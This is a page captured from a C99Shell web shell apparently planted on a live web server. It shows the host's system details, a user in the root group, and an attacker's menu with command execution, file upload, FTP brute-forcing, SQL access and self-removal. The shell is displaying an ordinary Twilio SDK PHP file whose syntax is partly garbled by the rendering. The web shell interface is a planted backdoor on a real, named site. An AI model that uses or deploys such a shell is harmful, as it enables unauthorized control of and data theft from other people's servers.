!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Messaging/V1/   drwxrwxr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DomainConfigOptions.php (4.15 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Messaging\V1;

use 
Twilio\Options;
use 
Twilio\Values;

/**
 * PLEASE NOTE that this class contains beta products that are subject to change. Use them with caution.
 */
abstract class DomainConfigOptions {
    
/**
     * @param string $fallbackUrl We will redirect requests to urls we are unable
     *                            to identify to this url.
     * @param string $callbackUrl URL to receive click events to your webhook
     *                            whenever the recipients click on the shortened
     *                            links
     * @param string $messagingServiceSidsAction An action type for
     *                                           messaging_service_sids operation
     *                                           (ADD, DELETE, REPLACE)
     * @return UpdateDomainConfigOptions Options builder
     */
    
public static function update(string $fallbackUrl Values::NONEstring $callbackUrl Values::NONEstring $messagingServiceSidsAction Values::NONE): UpdateDomainConfigOptions {
        return new 
UpdateDomainConfigOptions($fallbackUrl$callbackUrl$messagingServiceSidsAction);
    }
}

class 
UpdateDomainConfigOptions extends Options {
    
/**
     * @param string $fallbackUrl We will redirect requests to urls we are unable
     *                            to identify to this url.
     * @param string $callbackUrl URL to receive click events to your webhook
     *                            whenever the recipients click on the shortened
     *                            links
     * @param string $messagingServiceSidsAction An action type for
     *                                           messaging_service_sids operation
     *                                           (ADD, DELETE, REPLACE)
     */
    
public function __construct(string $fallbackUrl Values::NONEstring $callbackUrl Values::NONEstring $messagingServiceSidsAction Values::NONE) {
        
$this->options['fallbackUrl'] = $fallbackUrl;
        
$this->options['callbackUrl'] = $callbackUrl;
        
$this->options['messagingServiceSidsAction'] = $messagingServiceSidsAction;
    }

    
/**
     * Any requests we receive to this domain that do not match an existing shortened message will be redirected to the fallback url. These will likely be either expired messages, random misdirected traffic, or intentional scraping.
     *
     * @param string $fallbackUrl We will redirect requests to urls we are unable
     *                            to identify to this url.
     * @return $this Fluent Builder
     */
    
public function setFallbackUrl(string $fallbackUrl): self {
        
$this->options['fallbackUrl'] = $fallbackUrl;
        return 
$this;
    }

    
/**
     * URL to receive click events to your webhook whenever the recipients click on the shortened links
     *
     * @param string $callbackUrl URL to receive click events to your webhook
     *                            whenever the recipients click on the shortened
     *                            links
     * @return $this Fluent Builder
     */
    
public function setCallbackUrl(string $callbackUrl): self {
        
$this->options['callbackUrl'] = $callbackUrl;
        return 
$this;
    }

    
/**
     * An action type for messaging_service_sids operation (ADD, DELETE, REPLACE)
     *
     * @param string $messagingServiceSidsAction An action type for
     *                                           messaging_service_sids operation
     *                                           (ADD, DELETE, REPLACE)
     * @return $this Fluent Builder
     */
    
public function setMessagingServiceSidsAction(string $messagingServiceSidsAction): self {
        
$this->options['messagingServiceSidsAction'] = $messagingServiceSidsAction;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Messaging.V1.UpdateDomainConfigOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--